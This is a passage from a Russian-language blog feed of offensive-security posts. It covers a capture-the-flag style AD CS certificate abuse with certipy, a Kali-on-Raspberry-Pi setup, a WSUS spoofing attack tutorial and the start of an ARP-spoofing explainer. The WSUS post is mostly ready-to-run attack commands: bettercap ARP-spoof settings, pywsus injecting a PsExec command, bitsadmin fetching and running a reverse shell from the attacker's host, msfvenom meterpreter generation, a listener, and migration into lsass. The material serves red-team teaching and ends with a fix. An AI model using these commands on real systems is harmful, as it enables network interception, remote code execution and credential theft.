    &lt;img src=&quot;https://img3.teletype.in/files/67/05/670590dd-5246-439b-b1f7-930f24e092a6.png&quot; width=&quot;758&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;P20S&quot;&gt;Такой же результат будет.&lt;br /&gt;Видим, что ca_svc имеет переопределяемые разрешения для этого сертификата, делаем это&lt;/p&gt;
  &lt;pre id=&quot;tl6z&quot;&gt;KRB5CCNAME=$PWD/ca_svc.ccache certipy template -k -template DunderMifflinAuthentication -target DC01.sequel.htb -dc-ip 10.10.11.51&lt;/pre&gt;
  &lt;figure id=&quot;ejd4&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/8f/4b/8f4bd65f-33c5-4e88-ba07-4dafce57f569.png&quot; width=&quot;715&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;gw1m&quot;&gt;Используем &lt;strong&gt;&lt;code&gt;ca_svc&lt;/code&gt;&lt;/strong&gt; хеш учетных данных пользователя для получения билета аутентификации целевой системы через запрос &lt;strong&gt;Kerberos&lt;/strong&gt;&lt;/p&gt;
  &lt;pre id=&quot;mDiS&quot;&gt;certipy req -u ca_svc -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51&lt;/pre&gt;
  &lt;figure id=&quot;Ovfn&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e4/16/e4160581-695d-4f2c-a0f8-1a1e2089c1c1.png&quot; width=&quot;699&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;3rPY&quot;&gt;Тут могут быть проблемы с самой машиной, так что нужно пытаться несколько раз, и ребутать машину. Ошибка будет что сертификат .pfx генерироваться не будет, только .key, а он нам не нужен.&lt;/p&gt;
  &lt;p id=&quot;XadB&quot;&gt;Получаем хэш администратора &lt;strong&gt;через&lt;/strong&gt; &lt;strong&gt;сертификат&lt;/strong&gt;&lt;/p&gt;
  &lt;pre id=&quot;EdZm&quot;&gt;certipy auth -pfx administrator_10.pfx  -domain sequel.htb&lt;/pre&gt;
  &lt;figure id=&quot;hOqb&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b4/cf/b4cf1ee6-dc78-499b-a010-98f98ce80f2a.png&quot; width=&quot;1115&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;CfO6&quot;&gt;Получаем хеш, подключаемся через evil-winrm и лутаем root флаг, мы молодцы.&lt;/p&gt;

</content></entry><entry><id>black_maus:mInU8P7bEji</id><link rel="alternate" type="text/html" href="https://teletype.in/@black_maus/mInU8P7bEji?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=black_maus"></link><title>Установка Kali Linux на Raspberry Pi 4B и Alfa Networks</title><published>2024-11-13T07:20:55.297Z</published><updated>2024-11-13T07:20:55.297Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/91/9f/919fd8ad-ec53-496b-a6a7-012fbc9f4271.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img3.teletype.in/files/66/53/665347ef-81b9-4ed6-97f3-8fbc89aaecc2.jpeg&quot;&gt;Всем привет! Недавно на одном из кейсов по red team попала мне в руки малинка с фирменными клавиатурой и мышкой и альфой</summary><content type="html">
  &lt;p id=&quot;SJLL&quot;&gt;Всем привет! Недавно на одном из кейсов по red team попала мне в руки малинка с фирменными клавиатурой, мышкой и альфой. По удобству работы на клавиатуре скажу, что мне не понравилось. Мой топ это клавы от thinkpad&amp;#x27;ов.&lt;/p&gt;
  &lt;figure id=&quot;UURB&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/66/53/665347ef-81b9-4ed6-97f3-8fbc89aaecc2.jpeg&quot; width=&quot;4032&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;Kp9c&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/59/da/59daaad3-cc9d-4893-bf7f-d6838d3ff325.jpeg&quot; width=&quot;4032&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;ZOgz&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/ce/1e/ce1e0b73-8f56-42e2-aa87-7617857a538e.jpeg&quot; width=&quot;4032&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;T9CU&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ab/e6/abe6beca-1f57-460c-b239-7356eadee8cd.jpeg&quot; width=&quot;3024&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;VOiB&quot;&gt;На флешке была предустановленная Raspberry Pi OS. Было решено менять систему на kali, ввиду большего инструментария для проведения мероприятий. &lt;/p&gt;
  &lt;p id=&quot;knl5&quot;&gt;Итак, краткая инструкция по тому, как переустановить систему для Raspberry Pi 4B&lt;/p&gt;
  &lt;p id=&quot;aPFf&quot;&gt;Для начала вам понадобится:&lt;/p&gt;
  &lt;ol id=&quot;KQ2q&quot;&gt;
    &lt;li id=&quot;lLIp&quot;&gt;Raspberry Pi 4&lt;/li&gt;
    &lt;li id=&quot;F55c&quot;&gt;Клавиатура + мышь&lt;/li&gt;
    &lt;li id=&quot;pR89&quot;&gt;Флешка минимум на 16 ГБ&lt;/li&gt;
    &lt;li id=&quot;ja9W&quot;&gt;Монитор&lt;/li&gt;
    &lt;li id=&quot;Uxqq&quot;&gt;Ноутбук/ПК&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;ESLB&quot;&gt;Итак, на ноуте скачиваем &lt;a href=&quot;https://etcher.balena.io/&quot; target=&quot;_blank&quot;&gt;Etcher&lt;/a&gt; и &lt;a href=&quot;https://kali.download/arm-images/kali-2024.3/kali-linux-2024.3-raspberry-pi-arm64.img.xz&quot; target=&quot;_blank&quot;&gt;Kali для Raspberry&lt;/a&gt; &lt;/p&gt;
  &lt;p id=&quot;H4eJ&quot;&gt;У меня была флешка microsd на 32 ГБ, на которую я установил Kali&lt;/p&gt;
  &lt;figure id=&quot;Urfr&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f7/1b/f71b24fd-92c3-455e-b2ba-ac380165cc6b.jpeg&quot; width=&quot;4032&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;K9He&quot;&gt; Запускаем Etcher, выбираем &lt;strong&gt;flash from file&lt;/strong&gt;, выбираем флешку, нажимаем flash и ждем&lt;/p&gt;
  &lt;figure id=&quot;4T48&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e6/98/e698e412-0b3b-4dd9-ac7b-1004451aedf0.png&quot; width=&quot;799&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;dCNk&quot;&gt;Можно прошить и другим ПО, типа dd&lt;/p&gt;
  &lt;p id=&quot;rHBw&quot;&gt;После прошивки включаем монитор, клавиатуру, мышь. В моем случае я ещё подключил ethernet&lt;/p&gt;
  &lt;p id=&quot;zPPB&quot;&gt;Далее необходимо прописать в /etc/network/interfaces:&lt;/p&gt;
  &lt;pre id=&quot;iLQ4&quot;&gt;allow-hotplug eth0
iface eth0 inet static
address 192.168.170.187 #указываете ip-адрес из своей подсети и далее соотв
netmask 255.255.255.0
network 192.168.170.0
broadcast 192.168.170.255
gateway 192.168.170.250
dns-nameservers 8.8.8.8&lt;/pre&gt;
  &lt;p id=&quot;C1oj&quot;&gt;Если у вас в сети есть dhcp, то можно просто прописать в терминале &lt;/p&gt;
  &lt;pre id=&quot;H7fS&quot;&gt;dhclient&lt;/pre&gt;
  &lt;p id=&quot;4iXi&quot;&gt;и все заработает до перезагрузки&lt;/p&gt;
  &lt;p id=&quot;JlQ0&quot;&gt;После настройки сетевых интерфейсов необходимо обновить репозитории и пакеты &lt;/p&gt;
  &lt;pre id=&quot;3b75&quot;&gt;sudo apt update
sudo apt upgrade&lt;/pre&gt;
  &lt;p id=&quot;JsnF&quot;&gt;Официальная документация от &lt;a href=&quot;https://www.kali.org/docs/arm/raspberry-pi-4/&quot; target=&quot;_blank&quot;&gt;Kali&lt;/a&gt; для raspberry &lt;/p&gt;
  &lt;p id=&quot;7LUN&quot;&gt;Далее устанавливаем драйвера для альфы.&lt;/p&gt;
  &lt;p id=&quot;E413&quot;&gt;Важно! В процессе установки драйверов альфа должна быть отключена от raspberry&lt;/p&gt;
  &lt;p id=&quot;jid8&quot;&gt;Установка довольна простая, копируем драйвера с &lt;a href=&quot;https://github.com/aircrack-ng/rtl8812au&quot; target=&quot;_blank&quot;&gt;git&lt;/a&gt;&lt;/p&gt;
  &lt;pre id=&quot;aOrf&quot;&gt;git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git&lt;/pre&gt;
  &lt;p id=&quot;HtYn&quot;&gt;устанавливаем драйвера через make&lt;/p&gt;
  &lt;pre id=&quot;BPF2&quot;&gt;make &amp;amp;&amp;amp; make install&lt;/pre&gt;
  &lt;p id=&quot;mZFw&quot;&gt;или можно использовать dkms&lt;/p&gt;
  &lt;pre id=&quot;4MCg&quot;&gt;sudo make dkms_install&lt;/pre&gt;
  &lt;p id=&quot;NdMj&quot;&gt;Альфу я включал в usb 3.0, который по дефлоту не определяется альфой. Чтобы альфа могла работать по usb 3.0 для этого нужно прописать&lt;/p&gt;
  &lt;pre id=&quot;JqxA&quot;&gt;rmmod 88XXau
modprobe 88XXau rtw_switch_usb_mode=1&lt;/pre&gt;
  &lt;p id=&quot;0cGG&quot;&gt;Итак, теперь когда у нас все работает, идем ломать точки доступа :) &lt;/p&gt;

</content></entry><entry><id>black_maus:jWv-Ykza1XH</id><link rel="alternate" type="text/html" href="https://teletype.in/@black_maus/jWv-Ykza1XH?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=black_maus"></link><title>Атака на локальный сервер обновлений Windows (WSUS)</title><published>2024-10-03T07:16:58.147Z</published><updated>2024-10-03T07:16:58.147Z</updated><summary type="html">&lt;img src=&quot;https://img3.teletype.in/files/6e/e2/6ee2602d-b4a6-4154-8504-48ab7c097424.png&quot;&gt;По умолчанию при развёртывании службы обновлений Windows Server (WSUS) настройка SSL сертификатов не требуется, трафик передается в открытом виде по HTTP протоколу.</summary><content type="html">
  &lt;p id=&quot;ofgR&quot;&gt;По умолчанию при развёртывании службы обновлений Windows Server (WSUS) настройка SSL сертификатов не требуется, трафик передается в открытом виде по HTTP протоколу.&lt;/p&gt;
  &lt;p id=&quot;742y&quot;&gt;Данная конфигурация службы обновлений является уязвимой и может быть проэксплуатирована атакующим при помощи MitM-атаки: незащищенный трафик, идущий на легитимный сервер обновлений, перенаправляется на поддельный, что дает атакующему возможность внедрять произвольные метаданные обновлений (например подделывать ответы на SOAP запросы «SyncUpdates (software)» (данный запрос позволяет выполнить проверку наличия неустановленных обновлений ПО) и «GetExtendedUpdateInfo» (запрашивает метаданные обновления у WSUS, в числе которых URL ссылка на файл с обновлением)).&lt;/p&gt;
  &lt;p id=&quot;oP1z&quot;&gt;Последовательность &lt;a href=&quot;https://www.gosecure.net/blog/2020/09/03/wsus-attacks-part-1-introducing-pywsus/&quot; target=&quot;_blank&quot;&gt;атаки на WSUS:&lt;/a&gt;&lt;/p&gt;
  &lt;ul id=&quot;jxlH&quot;&gt;
    &lt;li id=&quot;AEDF&quot;&gt;Атакующий осуществляет MitM атаку;&lt;/li&gt;
    &lt;li id=&quot;M5Cj&quot;&gt;Клиент, ОС Windows, отправляет запрос на обновление системы на WSUS;&lt;/li&gt;
    &lt;li id=&quot;xFuO&quot;&gt;Атакующий подделывает ответ на запрос обновления. В ответе на запрос GetExtendedUpdateInfo, атакующий указывает файл, который будет загружен и выполнен. Поскольку на клиенте будут выполняться только исполняемые файлы с действительной подписью Microsoft, целесообразно использовать одну из утилит sysinternals, обладающих такой подписью. Также утилита должна иметь возможность выполнения команд, в связи с чем предлагается использовать PsExec.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;cwaW&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/8a/f2/8af2b102-4838-4db6-be92-9df79d716af9.png&quot; width=&quot;598&quot; /&gt;
  &lt;/figure&gt;
  &lt;ul id=&quot;ZPGE&quot;&gt;
    &lt;li id=&quot;hvX5&quot;&gt;Метаданные для пакета обновления содержат тег «InstallCommand», который используется для передачи дополнительных параметров при установке файла обновления. Эти параметры не проверяются на целостность, поэтому их можно изменить, получая возможность выполнять команды с правами привилегированной учетной записи «NT AUTHORITY\SYSTEM»:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;l9Xt&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/5e/b9/5eb912ad-616c-4295-80f2-e643aa459790.png&quot; width=&quot;607&quot; /&gt;
  &lt;/figure&gt;
  &lt;h2 id=&quot;ADUp&quot;&gt;Реализация атаки&lt;/h2&gt;
  &lt;p id=&quot;TJoE&quot;&gt;Первым шагом проведения атаки – является MitM атака, в ходе которой запрос на обновление будет перенаправлен на WSUS атакующего. Осуществить данную атаку можно при помощи инструмента bettercap, используя встроенный &lt;a href=&quot;https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/wsus-spoofing&quot; target=&quot;_blank&quot;&gt;механизм проксирования&lt;/a&gt; трафика:&lt;/p&gt;
  &lt;pre id=&quot;0CVs&quot;&gt;sudo bettercap -iface eth0&lt;/pre&gt;
  &lt;p id=&quot;fmYJ&quot;&gt;Для активации ARP spoofing атаки и перенаправления трафика необходимо использовать следующие настройки:&lt;/p&gt;
  &lt;pre id=&quot;hRvS&quot;&gt;set arp.spoof.targets 10.10.10.50
set arp.spoof.internal true
set any.proxy.iface eth0
set any.proxy.protocol TCP
set any.proxy.src_address $WSUS_IP
set any.proxy.src_port 8530
set any.proxy.dst_address 10.10.10.25
set any.proxy.dst_port 8530
any.proxy on
arp.spoof on&lt;/pre&gt;
  &lt;p id=&quot;hr2x&quot;&gt;-  arp.spoof.targets - определяет машину, ARP таблица которой будет отравлена; &lt;/p&gt;
  &lt;p id=&quot;rGBo&quot;&gt;-  arp.spoof.internal true - указывает на необходимость осуществления атаки на машины в локальной сети (по умолчанию атака осуществляется на шлюз); &lt;/p&gt;
  &lt;p id=&quot;LtmK&quot;&gt;-  any.proxy - определяют сетевой трафик, который будет перенаправлен: в данном случае весь TCP трафик идущий на $WSUS_IP:8530 будет перенаправлен на машину атакующего 10.10.10.25:8530;&lt;/p&gt;
  &lt;p id=&quot;dRDF&quot;&gt;-  any.proxy on - запускает перенаправление трафика;&lt;/p&gt;
  &lt;p id=&quot;OsX8&quot;&gt;-  arp.spoof on - запускает ARP spoofing атаку.&lt;/p&gt;
  &lt;figure id=&quot;fdQS&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/43/96/4396d4ae-1f2d-4d90-b387-3e9505a9413e.png&quot; width=&quot;624&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;qXZm&quot;&gt;Вторым шагом будет использование инструмента &lt;a href=&quot;https://github.com/GoSecure/pywsus&quot; target=&quot;_blank&quot;&gt;pywsus.py&lt;/a&gt; для развёртывания поддельного сервера обновлений и дальнейшей атаки:&lt;/p&gt;
  &lt;pre id=&quot;clWb&quot;&gt;python3 pywsus.py --host 10.10.10.25 --port 8530 --executable /path/to/PsExec64.exe --command &amp;#x27;/accepteula /s cmd.exe /c &amp;quot;some command&amp;quot;&amp;#x27;&lt;/pre&gt;
  &lt;p id=&quot;kqxR&quot;&gt;-  --host (-H) – IP адрес атакующего;&lt;/p&gt;
  &lt;p id=&quot;vBXL&quot;&gt;-  --port (-p) – порт, на котором будет запущен поддельный WSUS;&lt;/p&gt;
  &lt;p id=&quot;daRZ&quot;&gt;-  --executable (-e) указывает на утилиту, обладающую подписью Microsoft, и возможностью исполнения команд;&lt;/p&gt;
  &lt;p id=&quot;auzI&quot;&gt;-  --command – команда которая будет помещена в аргумент InstallCommand.&lt;/p&gt;
  &lt;figure id=&quot;HnDV&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/fe/7e/fe7eb983-6efe-4fa3-a188-32909aaad3d5.png&quot; width=&quot;624&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ayF7&quot;&gt;В качестве команды может быть загрузка и выполнение файла для получения удаленной оболочки: &lt;/p&gt;
  &lt;pre id=&quot;auTT&quot;&gt;bitsadmin /transfer mydownloadjob /download /priority FOREGROUND &amp;quot;http://10.10.10.25:8080/reverse.exe&amp;quot; &amp;quot;%TEMP%\reverse.exe&amp;quot; &amp;amp;&amp;amp; %TEMP%\reverse.exe&lt;/pre&gt;
  &lt;p id=&quot;2iTl&quot;&gt;Помимо утилиты bitsadmin для загрузки файлов можно использовать другие исполняемые файлы, полный перечень которых можно найти в списке &lt;a href=&quot;https://github.com/LOLBAS-Project/LOLBAS&quot; target=&quot;_blank&quot;&gt;lolbins&lt;/a&gt;.&lt;br /&gt;Для создания полезной нагрузки (файла reverse.exe) можно воспользоваться утилитой &lt;a href=&quot;https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.htm&quot; target=&quot;_blank&quot;&gt;msfvenom&lt;/a&gt;, для этого выполним команду:&lt;/p&gt;
  &lt;pre id=&quot;ZYli&quot;&gt;msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.10.25 LPORT=6666 -f exe -o reverse.exe&lt;/pre&gt;
  &lt;figure id=&quot;4zC9&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a9/dd/a9ddbcfd-ba3f-48ae-9573-13585d9be9b5.png&quot; width=&quot;623&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Amlf&quot;&gt;Для доставки файла запустим http-сервер:&lt;/p&gt;
  &lt;pre id=&quot;2F2S&quot;&gt;python3 -m http.server 8080&lt;/pre&gt;
  &lt;figure id=&quot;Fqo7&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/14/42/14422e66-f3a4-4ee8-a68a-70418567aefd.png&quot; width=&quot;624&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;XlCM&quot;&gt;Если атакующий обладает доступом к непривилегированной учетной записи, он может инициировать проверку обновления вручную, что позволит выполнить команды с повышенными привилегиями (от имени учетной записи «NT AUTHORITY\SYSTEM»), тем самым достигая локального повышения привилегий (Local Privilege Escalation, LPE) (из графического интерфейса «Проверить наличие обновлений», из консоли командой usoclient.exe startscan). Также существует реализация данной атаки с локальным поддельным WSUS &lt;a href=&quot;https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/&quot; target=&quot;_blank&quot;&gt;WSuspicious&lt;/a&gt;.&lt;/p&gt;
  &lt;figure id=&quot;k1Sn&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c1/ba/c1bad2d0-447b-4786-9c68-0d871f07086d.png&quot; width=&quot;624&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;woxo&quot;&gt;Тем временем следует запустить listener и дождаться получения meterpreter сессии:&lt;/p&gt;
  &lt;pre id=&quot;zyRB&quot;&gt;msfconsole -q -x &amp;quot;use multi/handler; set payload windows/x64/meterpreter_reverse_tcp; set lhost 10.10.10.25; set lport 6666; exploit&amp;quot;&lt;/pre&gt;
  &lt;p id=&quot;VYMF&quot;&gt;&lt;/p&gt;
  &lt;figure id=&quot;2Fie&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c4/ad/c4adf824-5974-4099-bfae-dc6af15e8923.png&quot; width=&quot;624&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;H59S&quot;&gt;Была получена meterpreter сессия от пользователя «NT AUTHORITY\SYSTEM» с рабочей станции USER-PC2.&lt;br /&gt;Для практического выполнения следующих разделов можно открыть meterpreter сессию вручную, для этого выполните шаги по созданию и доставке reverse.exe (а также запуску listener), выполните команду для загрузки и выполнения файла для получения удаленной оболочки (bitsadmin …) от имени пользователя PcAdmin (пароль qwe123!@#) на рабочей станции USER-PC2 (запустив cmd с правами администратора).&lt;/p&gt;
  &lt;pre id=&quot;2n0X&quot;&gt;bitsadmin /transfer mydownloadjob /download /priority FOREGROUND &amp;quot;http://10.10.10.25:8080/reverse.exe&amp;quot; &amp;quot;%TEMP%\reverse.exe&amp;quot; &amp;amp;&amp;amp; %TEMP%\reverse.exe&lt;/pre&gt;
  &lt;p id=&quot;6KMi&quot;&gt;Так как пользователь PcAdmin входит в группу локальных администраторов USER-PC2, при помощи модуля &lt;a href=&quot;https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/windows/escalate/getsystem.md&quot; target=&quot;_blank&quot;&gt;getsystem&lt;/a&gt; можно получить системные привилегии. Далее необходимо выполнить миграцию на системный процесс, например lsass.exe:&lt;/p&gt;
  &lt;pre id=&quot;IXsw&quot;&gt;migrate -N lsass.exe&lt;/pre&gt;
  &lt;figure id=&quot;6YTr&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/6b/2e/6b2e7bd8-a06a-4422-a2bb-8e0294581d69.png&quot; width=&quot;623&quot; /&gt;
  &lt;/figure&gt;
  &lt;h1 id=&quot;C10k&quot;&gt;Рекомендации&lt;/h1&gt;
  &lt;p id=&quot;CfEg&quot;&gt;Настроить HTTPS соединение для работы с сервисом обновлений Windows. Для этого необходимо выполнить следующие &lt;a href=&quot;https://techcommunity.microsoft.com/t5/windows-it-pro-blog/security-best-practices-for-windows-server-update-services-wsus/ba-p/1587536&quot; target=&quot;_blank&quot;&gt;шаги&lt;/a&gt;:&lt;/p&gt;
  &lt;ul id=&quot;0UE8&quot;&gt;
    &lt;li id=&quot;W34G&quot;&gt;Создать/получить сертификат;&lt;/li&gt;
    &lt;li id=&quot;op0a&quot;&gt;Установить сертификат для веб-сервера WSUS;&lt;/li&gt;
    &lt;li id=&quot;WkrD&quot;&gt;Для IIS каталогов: ApiRemoting30, ClientWebServices, DssAuthWebService, ServerSyncWebService, SimpleAuthWebService, установить принудительное использование шифрования SSL/TLS;&lt;/li&gt;
    &lt;li id=&quot;jQLY&quot;&gt;Настроить WSUS для использования HTTPS;&lt;/li&gt;
    &lt;li id=&quot;UjO8&quot;&gt;Настроить клиентов для использования HTTPS.&lt;/li&gt;
  &lt;/ul&gt;

</content></entry><entry><id>black_maus:1bSVRv_yOFK</id><link rel="alternate" type="text/html" href="https://teletype.in/@black_maus/1bSVRv_yOFK?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=black_maus"></link><title>Man-In-The-Middle (MITM)</title><published>2024-08-12T09:00:27.966Z</published><updated>2024-08-12T09:00:27.966Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/4f/ac/4fac3ea3-f46d-4c08-bb14-5b909c4edfa9.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img2.teletype.in/files/d3/79/d3794374-d59c-4bcd-925e-32966fc777db.png&quot;&gt;Атаки типа Man-In-The-Middle (MITM) представляют собой одну из самых опасных и распространённых форм кибератак. Они заключаются в перехвате и потенциальных изменениях коммуникаций между двумя участвующими сторонами, часто без ведома обеих сторон. Это позволяет злоумышленнику получить доступ к чувствительной информации, такой как пароли, номера кредитных карт, деловая переписка и другие конфиденциальные данные.</summary><content type="html">
  &lt;p id=&quot;ypOV&quot;&gt;Принцип атак MITM заключается в том, что атакующий внедряется в сетевое взаимодействие и выступает в качестве посредника между атакуемыми узлами, ретранслируя их сообщения. Осуществить подобную атаку в локальной сети в частности можно при помощи техники &lt;strong&gt;ARP-spoofing&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;6Ocv&quot;&gt;ARP (Address Resolution Protocol – протокол определения адреса) – протокол в компьютерных сетях, предназначенный для определения MAC адреса компьютера по известному IP-адресу. Данный протокол используется во время сетевого взаимодействия для отображения IP-адреса на MAC-адрес во время подготовки и отправки кадров протокола канального уровня (на канальном уровне адресация происходит по MAC-адресам). Существуют следующие типы ARP-сообщений: ARP запрос (ARP request) и ARP ответ (ARP reply).&lt;br /&gt;Для того чтобы отправить сетевой пакет системе необходимо знать MAC-адрес получателя (для инкапсуляции сетевого пакета (дейтаграммы) в кадр канального уровня), для этого первым шагом система проверяет локальную ARP таблицу (представлена на рисунке ниже), если записи с IP-адресом в ARP таблице нет, ARP протокол выполняет следующие действия:&lt;/p&gt;
  &lt;ul id=&quot;E916&quot;&gt;
    &lt;li id=&quot;jx9B&quot;&gt;Выполняется широковещательный ARP запрос, содержащий IP-адрес получателя&lt;/li&gt;
    &lt;li id=&quot;0xyv&quot;&gt;Узел, имеющий требуемый IP-адрес (указан в ARP запросе), отправляет ARP ответ, содержащий его MAC-адрес;&lt;/li&gt;
    &lt;li id=&quot;JQo0&quot;&gt;Данный ответ обрабатывается инициатором запроса, соответствующая запись добавляется в ARP таблицу;&lt;/li&gt;
    &lt;li id=&quot;t3FU&quot;&gt;Выполняется успешное отображение IP-адреса в MAC-адрес.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;p6pL&quot;&gt;Особенностью работы ARP протокола является возможность обновления ARP таблицы без отправки ARP запроса, т.е. любой узел в локальной сети, получающий широковещательный ARP запрос, может обновить информацию об отправителе данного ARP запроса (изменить соответствие IP-адреса MAC-адресу в ARP таблице) (при условии, что ARP запись не является статичной).&lt;/p&gt;
  &lt;p id=&quot;8T3C&quot;&gt;Для оповещения узлов в сети об появлении нового узла (или при изменении сетевых настроек существующих узлов) применяется специальный Gratuitous ARP запрос. Данный ARP запрос запрашивает MAC-адрес собственного узла, т.е. посылает широковещательный ARP запрос, содержащий собственный IP-адрес (данный запрос остается без ответа, если в сети нет дублирующего IP-адреса).&lt;/p&gt;
  &lt;p id=&quot;DNTW&quot;&gt;Проверить записи в ARP таблице можно командой:&lt;/p&gt;
  &lt;pre id=&quot;sUFd&quot;&gt;arp -a&lt;/pre&gt;
  &lt;figure id=&quot;6yKe&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/82/ce/82ce8b0b-c791-40b8-b348-1e3afe7d8fc9.png&quot; width=&quot;607&quot; /&gt;
    &lt;figcaption&gt;Проверка таблицы ARP&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Za4f&quot;&gt;Принцип атаки ARP-spoofing заключается в модификации локальной ARP таблицы машин таким образом, что MAC-адрес легитимного устройства в сети заменяется MAC-адресом атакующего. Это осуществляется за счет непрерывной отправки большого количества Gratuitous ARP запросов, которые атакуемый хост обрабатывает и использует для обновления информации об отправителе в локальной ARP таблице (атака осуществляется непрерывно, т.к. легитимные узлы могут восстановить ARP запись, отправив ARP пакет). Данная атака возможна из-за отсутствия механизма аутентификации для проверки сообщений в ARP протоколе, т.е. любой узел в сети может ответить на широковещательный ARP запрос (или отправить Gratuitous ARP).&lt;br /&gt;Данная атака позволяет атакующему прослушивать, модифицировать, или перенаправлять сетевой трафик с атакуемых узлов. Осуществить атаку можно при помощи следующих инструментов:&lt;/p&gt;
  &lt;ul id=&quot;BZF7&quot;&gt;
    &lt;li id=&quot;RZeV&quot;&gt;&lt;strong&gt;&lt;a href=&quot;https://www.ettercap-project.org/&quot; target=&quot;_blank&quot;&gt;Ettercap&lt;/a&gt;&lt;/strong&gt;: Это один из наиболее известных инструментов для проведения MITM атак, включая ARP-spуфинг. Ettercap поддерживает перехват и фильтрацию сетевого трафика, а также предоставляет графический интерфейс для удобства использования. &lt;/li&gt;
    &lt;li id=&quot;6YCN&quot;&gt;&lt;strong&gt;&lt;a href=&quot;https://www.bettercap.org/&quot; target=&quot;_blank&quot;&gt;Bettercap&lt;/a&gt;&lt;/strong&gt;: Современный инструмент, который поддерживает различные виды MITM атак, включая ARP-spуфинг. Bettercap отличается своей гибкостью и удобством в настройке, а также имеет активную поддержку и частые обновления. &lt;/li&gt;
    &lt;li id=&quot;xSd0&quot;&gt;&lt;strong&gt;&lt;a href=&quot;https://github.com/smikims/arpspoof&quot; target=&quot;_blank&quot;&gt;Arpspoof&lt;/a&gt;&lt;/strong&gt;: Это простой, но эффективный инструмент для ARP-spуфинга, который является частью пакета dsniff. Arpspoof позволяет легко перенаправлять трафик через машину атакующего, что делает его отличным выбором для тех, кто только начинает изучать эту технику. &lt;/li&gt;
    &lt;li id=&quot;fMGR&quot;&gt;&lt;strong&gt;&lt;a href=&quot;https://github.com/byt3bl33d3r/MITMf&quot; target=&quot;_blank&quot;&gt;MITMf&lt;/a&gt;&lt;/strong&gt; (Man-In-The-Middle-Framework): Комплексный фреймворк, включающий в себя инструменты для различных атак типа MITM, включая ARP-spуфинг. MITMf объединяет возможности нескольких инструментов и предоставляет мощный набор для проведения сетевых атак.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h2 id=&quot;Rqqy&quot;&gt;Реализация атаки&lt;/h2&gt;
  &lt;p id=&quot;R9hK&quot;&gt;Рассмотрим реализацию атаки arp-spoofing с помощью инструмента &lt;a href=&quot;https://github.com/bettercap/bettercap&quot; target=&quot;_blank&quot;&gt;bettercap&lt;/a&gt;:&lt;/p&gt;
  &lt;pre id=&quot;oXKh&quot;&gt;sudo bettercap -iface eth0&lt;/pre&gt;
